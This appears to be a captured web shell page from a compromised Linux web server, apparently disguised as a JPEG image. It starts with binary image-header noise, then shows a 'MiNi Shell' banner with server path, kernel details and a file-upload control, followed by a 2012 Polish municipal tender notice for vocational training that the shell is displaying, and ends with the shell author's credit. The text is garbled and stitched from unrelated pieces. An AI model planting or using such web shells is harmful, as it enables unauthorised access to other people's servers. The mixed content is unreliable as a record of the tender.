JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120418/123308-N-2012.html

<p class="kh_header"><b>Chełmno: Przedmiotem zamówienia jest kompleksowe zorganizowanie i przeprowadzenie działań w ramach projektu Podnieś głowę  potrafisz współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej w zakresie:
1. Kursów  zawodowych
2. Treningu kompetencji  społecznych i życiowych
3. Doradztwa zawodowego 
4. Doradztwa prawnego
5. Programu Aktywności Lokalnej -  trening kompetencji społ</b><br>
<b>Numer ogłoszenia: 123308 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul.Gen.J.Hallera 11, 86-200 Chełmno, woj. kujawsko-pomorskie, tel. 56 686 18 50, faks 56 686 18 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopschelmno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest kompleksowe zorganizowanie i przeprowadzenie działań w ramach projektu Podnieś głowę  potrafisz współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej w zakresie:
1. Kursów  zawodowych
2. Treningu kompetencji  społecznych i życiowych
3. Doradztwa zawodowego 
4. Doradztwa prawnego
5. Programu Aktywności Lokalnej -  trening kompetencji społ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kursy zawodowe teoretyczne i praktyczne w instytucjach i zakładach odpowiadających specyfice danego kursu dla 56 beneficjentów (podopieczni MOPS)
a) sprzedawca z obsługą kasy fiskalnej i fakturowaniem  14 osób (80 godz. dla każdej osoby) (IX, X,XI 2012r.)
b) opiekun osób starszych  17 osób (120 godz. dla każdej osoby) (IX, X,XI 2012r.)
c) obsługa wózków jezdniowych i wymiany butli gazowej  13 osób (67 godz. dla każdej osoby) (IX, X, XI 2012r.)
d) stylizacja paznokci i przedłużanie paznokci metodą akrylową z elementami wizażu 5 osób (40 godz.) (IX,X,XI 2012r.)
e) opiekunka dziecięca  1 osób (120 godz.) (IX, X, XI 2012r.)
f) konserwator terenów zielonych 4 osób (40 godz.) (VIII 2012r.)
g) pomoc kuchenna   1 osoba ( 60  godz.) (IX, X, XI 2012)h) bukieciarstwo I stopnia    1 osoba (40  godz.) ( IX, X, XI 2012)
1 godzina dydaktyczna = 45 minut
Wykonanie badań lekarskich dla 56 beneficjentów w celu stwierdzenia braku przeciwwskazań  do odbycia  danego kursu  zawodowego i dodatkowych badań specjalistycznych, jeśli takie będą wymagane.
Okres trwania kursów:  sierpień, wrzesień, październik, listopad  2012 r.
Kursy zawodowe winny odbywać się od poniedziałku do piątku (w dni robocze).
Kursy winny odbywać się w czasie między godziną 8:00 a  18:00.
Kursy winny odbywać się w Chełmnie lub w innej miejscowości oddalonej od Chełmna nie dalej niż 45 km.
Dowiezienie (w sytuacji kiedy ze względów technicznych realizacja kursu na miejscu nie będzie możliwa) przez wykonawcę uczestników z ich miejsca zamieszkania do miejsca odbywania kursów i odwiezienie z powrotem do ich miejsca zamieszkania po zakończeniu kursów.
Wykonawca w ciągu każdego dnia zajęciowego zapewnienia: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane będą minimum kawa, herbata, zimne napoje 0,5 litra na jednego uczestnika (sok, woda) oraz poczęstunek w postaci ciepłego dania  obiadowego (ziemniaki/ frytki, surówka, mięso). 
2. Trening kompetencji społecznych i życiowych
Trening kompetencji społecznych i życiowych dla 56 beneficjentów (podopieczni MOPS).
Podział beneficjentów na trzy grupy.
Ilość godzin dydaktycznych dla każdej grupy  25 godz (1 godz. dydaktyczna - 45 minut)
Zajęcia winny odbywać się od poniedziałku do piątku (w dni robocze) w godz. 8.0018.00.
Okres odbywania zajęć:  czerwiec, lipiec 2012 r.
Zajęcia winny być prowadzone przez specjalistów.
Wymagany minimalny zakres tematyczny zajęć:
trening asertywności,
trening umiejętności społecznych,
sposoby radzenia sobie ze stresem i negatywnymi emocjami, 
zasady konstruowania celów życiowych,
komunikacja interpersonalna.
Warsztaty winny odbywać się na terenie miasta  Chełmna.
Wykonawca w ciągu każdego dnia zajęciowego zapewnienia: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane będą minimum kawa, herbata, zimne napoje 0,5 litra na jednego uczestnika (sok, woda) oraz poczęstunek w postaci ciepłego dania  obiadowego (ziemniaki/ frytki, surówka, mięso). 
3. Doradztwo zawodowe w formie grupowej
Doradztwo zawodowe dla 56 beneficjentów (podopieczni MOPS).
Podział beneficjentów na trzy grupy.
Zajęcia winny odbywać się w od poniedziałku do piątku (w dni robocze) w godz. 8.00 18.00.
Okres odbywania zajęć:  czerwiec, lipiec 2012 r.
Ilość godzin dydaktycznych dla każdej z grup  30 godz. (1 godz. dydaktyczna = 45minut) 
Zajęcia winny być prowadzone przez specjalistów.Wymagany minimalny zakres tematyczny zajęć: 
charakterystyka rynku pracy, poszukiwanie ofert pracy,
metody aktywnego  poszukiwania pracy,
przygotowanie materiałów aplikacyjnych  (CV, list motywacyjny),
określenie kierunków poszukiwania pracy lub zmiana, podniesienie kwalifikacji zawodowych zgodnie z indywidualnymi predyspozycjami uczestnika,
 rozmowa kwalifikacyjna.  
Warsztaty winny odbywać się na terenie miasta Chełmna.
Wykonawca w ciągu każdego dnia zajęciowego zapewnienia: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane będą minimum kawa, herbata, zimne napoje 0,5 litra na jednego uczestnika (sok, woda) oraz poczęstunek w postaci ciepłego dania  obiadowego (ziemniaki/ frytki, surówka, mięso).
4. Doradztwo prawne w formie grupowej
Zajęcia dla 56 beneficjentów (podopieczni MOPS).
Podział beneficjentów na 3 grupy.
Warsztaty winny odbywać się w od poniedziałku do piątku (w dni robocze), w godz.8.00 18.00.
Okres odbywania zajęć: czerwiec, lipiec 2012 r.
Ilość godzin dydaktycznych dla każdej z grup  35 godz. (1 godz. dydaktyczna = 45minut).
Warsztaty winny być prowadzone przez specjalistów.
Wymagany minimalny zakres tematyczny  zajęć:
prawo rodzinno opiekuńcze,
prawo cywilne,
prawo działalności gospodarczej i zakładanie spółdzielni socjalnych.
Zajęcia praktyczne- w formie jednego warsztatu winny odbywać się na terenie spółdzielni socjalnej w  woj. kujawsko - pomorskim.
Wykonawca w ciągu każdego dnia zajęciowego zapewnienia: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane będą minimum kawa, herbata, zimne napoje 0,5 litra na jednego uczestnika (sok, woda) oraz poczęstunek w postaci ciepłego dania  obiadowego (ziemniaki/ frytki, surówka, mięso).
5. Program Aktywności Lokalnej
Zajęcia z 8 beneficjentami i ich otoczeniem  rodzice lub opiekunowie, dzieci (łącznie 42 osoby).
Forma zajęć wyjazdowa w m  cu lipcu i sierpniu 2012 r. (2 wyjazdy dwudniowe, każdorazowo  z jednym noclegiem i pełnym wyżywieniem).
Zapewnienie dowozu wszystkich uczestników na miejsce odbywania się zajęć oraz powrotu do miejsca zamieszkania.
W zajęciach winny być wykorzystane 4 instrumenty aktywnej integracji:
a) społeczny
b) zdrowotny
c) zawodowy
d) edukacyjny
Wymagany minimalny zakres programowy zajęć w ramach warsztatów Szkoły Rodzica trening kompetencji i umiejętności społecznych i życiowych w ilości 15 h:(pokonanie swoich lęków i obaw ograniczających uczestnictwo w życiu społecznym i zawodowym, autodiagnoza uczestników,rozwijanie prawidłowych relacji w rodzinie, zasady zdrowego stylu życia, dbałość o własny wizerunek, metody skutecznego poruszania się po rynku pracy); doradztwo specjalistyczne (psycholog, terapeuta zajęciowy,): podstawy pedagogiki i psychologi w kontekście opieki nad dziećmi niepełnosprawnymi, rozwijanie kompetencji rodzicielskich, ilości 6 h; doradztwo zawodowe w ilości 6 h; metody aktywnego poszukiwania pracy, podstawy tworzenia materiałów aplikacyjnych, warsztaty plastyczne w ilości 4 h (wspólne dla beneficjentów i otoczenia): moja rodzina, praktyczne wykorzystanie nabytych na warsztatach wiedzy i umiejętności.
Zajęcia prowadzone winny być przez specjalistów.
Wykonawca zapewnienia w trakcie trwania pobytu wyjazdowego pełne wyżywienie dla uczestników i otoczenia oraz podczas trwania zajęć: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane będą minimum kawa, herbata, zimne napoje 2 litry na jednego uczestnika  osoby dorosłe i dzieci sok, woda.
Wykonawca zapewnia materiały szkoleniowe adekwatne do treści odbywanych  zajęć oraz opiekę dla dzieci podczas odbywania zajęć przez beneficjentów oraz ubezpieczenia wszystkich uczestników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w/w zostanie spełniony, jeżeli Wykonawca przedłoży stosowne zezwolenie potwierdzające, że instytucja szkoleniowa posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy ze względu na siedzibę instytucji szkoleniowej (podstawa prawna  art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy. tj. Dz. U z 2008r. Nr 69, poz.415 z póź. zm). Ocena wg formuły spełnia-nie spełnia na podstawie dkumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, wykonał usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie (referencje).
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał należycie co najmniej  5 zamówień polegających na zorganizowaniu i przeprowadzeniu zajęć, warsztatów, kursów lub szkoleń na rzecz  Ośrodków Pomocy Społecznej lub Powiatowych Centrów Pomocy Rodzinie,  w tym nie mniej niż 3 o wartości nie mniejszej niż 60.000 zł brutto (sześćdziesiąt tysięcy złotych) każde zamówienie, z podaniem ich wartości, przedmiotu, dat wykonania, ilości uczestników biorących udział w szkoleniu i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie w postaci pisemnych referencji.  Ponadto usługi te muszą obejmować przynajmniej 3 różne kursy zawodowe dotyczące przedmiotu zamówienia. 
Projekty własne realizowane przez Wykonawców  nie uważa się za zamówienia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dostarczonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia tego warunku Wykonawcy muszą wykazać, że dysponują urządzeniami niezbędnymi do realizacji zamówienia, w tym szczególności: 1 szt. rzutnik multimedialny + ekran, 3 szt. laptopów. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dostarczonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia tegi waruku Wykonawcy muszą wykażać, że dysponują zasobami kadrowymi, w ramach których osoby bezpośrednio zaangażowane                        w realizację zamówienia posiadają kwalifikacje, doświadczenie i wykształcenie zawodowe niezbędne do prowadzenia zajęć, warsztatów, kursów będących przedmiotem zamówienia. Wykonawca zobowiązany jest wykazać doświadczenie zawodowe osób realizujących zamówienie poprzez  udokumentowanie przeprowadzonych minimum 9 szkoleń przez danego specjalistę: - 3 z zakresu treningu kompetencji  społecznych i życiowych, -3 z zakresu z doradztwa zawodowego, - 3 z zakresu doradztwa prawnego. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dostarczonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia tego warunku Wykonawcy muszą wykazać, posiadanie polisy OC w zakresie prowadzonej działalności gospodarczej lub innego dokumentu potwierdzającego ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej na czas nie krótszy, niż do zakończenia realizacji zamówienia 30.11.2012 r., z sumą ubezpieczenia nie mniejszą niż 100.000 tys. zł.                    ( sto tysięcy złotych).Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dostarczonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul.Hallera 1 86 200 Chełmno (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul.Hallera 1 86 200 Chełmno (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt wspólfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com